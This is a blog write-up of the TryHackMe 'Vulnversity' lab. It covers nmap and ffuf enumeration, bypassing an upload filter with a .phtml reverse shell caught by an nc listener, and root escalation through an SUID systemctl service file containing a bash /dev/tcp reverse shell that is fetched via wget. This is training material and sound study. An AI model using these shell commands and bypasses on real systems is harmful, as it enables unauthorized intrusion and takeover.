334 words
2 minutes
Vulnversity Writeup - TryHackMe
2023-08-10
TryHackMe
TryHackMe
/
Enumeration
/
PrivEsc

Vulnversity#

This room is based on active recon, web app attacks, and privilege escalation.

Task 1: Deployment#

The first and most important task is to deploy the machine. Once it’s live, the vulnerable machine IP is assigned. All other tasks are performed on it. You can also increase the machine time if needed.

Task 2: Reconnaissance#

We begin by scanning the target machine using nmap.

Common Nmap Commands#

nmap command flags

Nmap Scan Result#

Terminal window
nmap -sC -sV -A -oN initial <machine IP>

nmap result

Key Observations:

  • 6 ports are open.
  • Squid version 3.5.12 is running.
  • OS is Ubuntu.
  • A web server is running on port 3333.

Additional answers:

  • -p-400 scans the first 400 ports.
  • -n disables DNS resolution.
TIP

If we don’t specify any port and scan technique by default nmap will perform scan on the most common 1,000 ports for each protocol and Perform default -sS SCAN TECHNIQUES.

Task 3: Locating Directories Using FFUF#

This task involves directory enumeration. Although the room mentions gobuster, we’ll use ffuf.

FFUF Command#

Terminal window
ffuf -u http://<machine IP>:3333/FUZZ -w <wordlist path>

ffuf commands

FFUF Results#

ffuf result

We found /internal which contains a file upload form.

Task 4: Compromising the Web Server#

Trying to upload a .php file gives this error:

upload error

How to Bypass?#

Use BurpSuite’s Intruder to fuzz extensions. Try these:

  • .php, .php3, .php4, .php5, .phtml

burpsuite intruder

Paste the extensions into the payload.

extension list

.phtml is accepted as it returns a different response size:

different response

Upload a reverse shell as rev.phtml:

upload success

Start a listener with:

Terminal window
nc -lvnp 4444

Click the uploaded file and get a shell:

reverse shell

Check user info:

user info

User Flag#

user flag

Key Takeaways:

  • .php is blocked, but .phtml is allowed.
  • Username is bill.
  • Found user flag.

Task 5: Privilege Escalation#

Check for SUID binaries:

Terminal window
find / -type f -perm -04000 -ls 2>/dev/null

We find /bin/systemctl:

systemctl suid

Exploit with GTFOBins#

Reference: GTFOBins - systemctl

Modified service file:

Terminal window
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<your-ip>/4445 0>&1'
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target

exploit code

Host it with:

Terminal window
python3 -m http.server 80

http server

Download it on the target:

Terminal window
wget http://<your-ip>/root.service

wget file

Run the service:

Terminal window
systemctl link /home/bill/root.service
systemctl enable root.service
systemctl start root.service

systemctl start

Catch the root shell:

root shell

Root Flag#

During the privilege escalation phase, /bin/systemctl was identified as an unusual SUID binary. Exploiting it allowed us to escalate privileges and access the root shell.

The root flag obtained is:

a5...d5
Vulnversity Writeup - TryHackMe
https://blog.hanzalaghayasabbasi.com/posts/vulnversity/
Author
Hanzala Ghayas Abbasi
Published at
2023-08-10
License
CC BY-NC-SA 4.0
Sudo Buffer Overflow - TryHackMe
Sudo Security Bypass - TryHackMe
© 2025 Hanzala Ghayas Abbasi. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari